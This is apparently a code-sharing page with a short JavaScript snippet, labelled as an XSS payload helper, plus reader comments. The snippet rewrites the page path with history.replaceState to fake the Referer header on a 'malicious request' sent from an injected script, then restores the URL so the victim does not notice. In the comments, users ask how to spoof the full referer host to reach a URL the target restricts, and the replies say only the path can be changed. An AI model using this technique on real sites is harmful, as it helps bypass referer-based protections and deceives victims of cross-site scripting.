Code Snippet to Set 'Referer' Header using JavaScript (e.g. XSS Payload)

setRefererHeader.js

// Save the current URL path to restore after making 
// malicious request with faked referer header value
var savedPath   = window.location.pathname;
var savedSearch = window.location.search;

// Change URL/History to control the referer header value
// Swap out "/this-is-my-fake-referer-value" to be what you need
window.history.replaceState(null, '', '/this-is-my-fake-referer-value');

// Send malicious request with faked referer header value
// NOTE: this assumes you're using some xhr request, adjust
// based on whatever your XSS payload is actually doing
xhr.send(body);

// Restore the URL value to the original one before
// the XSS victim notices their location bar changed
window.history.replaceState(null, '', savedPath + savedSearch);

Hey @hoodoer, thanks for the great article. Is there a way to similarly modify the host part of the referer using javascript ?
There is a url I need to be able to access directly, however, the target host does not let me access it directly unless the referer is said host.

@alkanna I'm afraid not, just the relative path.

@alkanna, I wonder if you could create an iframe in the page you have running JavaScript, put the needed host into the iframe, and then make the request from that context? I haven't coded that up to try, but might be possible. Would be fun to play with for sure.

Is it possible to change the entire referrer header? Not the "/this-is-my-fake-referer-value" part. Is it possible to change it like "http://referer.com"?

Is it possible to change the entire referrer header? Not the "/this-is-my-fake-referer-value" part. Is it possible to change it like "http://referer.com"?

I'm afraid not, you can only control the relative path under the host.